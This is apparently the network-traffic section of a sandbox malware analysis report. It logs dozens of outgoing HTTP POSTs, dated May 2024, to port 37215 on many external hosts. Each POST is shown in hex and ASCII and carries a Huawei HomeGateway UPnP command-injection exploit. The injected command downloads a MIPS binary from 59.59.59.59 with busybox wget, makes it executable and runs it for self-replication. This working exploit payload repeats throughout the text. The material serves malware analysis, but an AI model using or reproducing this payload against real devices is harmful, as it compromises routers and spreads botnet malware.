                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          810192.168.2.156079641.213.193.22037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.675882101 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          811192.168.2.15600828.75.49.21637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.676106930 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          812192.168.2.1559204197.97.83.13237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.676130056 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          813192.168.2.1558296197.237.244.5637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.676182032 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          814192.168.2.1540916197.146.155.5537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.676316977 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          815192.168.2.1550244197.14.18.23237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.676400900 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          816192.168.2.1534176197.47.182.10637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.676496983 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          817192.168.2.1555600197.36.166.16437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.676520109 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          818192.168.2.1541816197.133.28.21937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.676558971 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          819192.168.2.1540284181.16.59.2737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.676647902 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 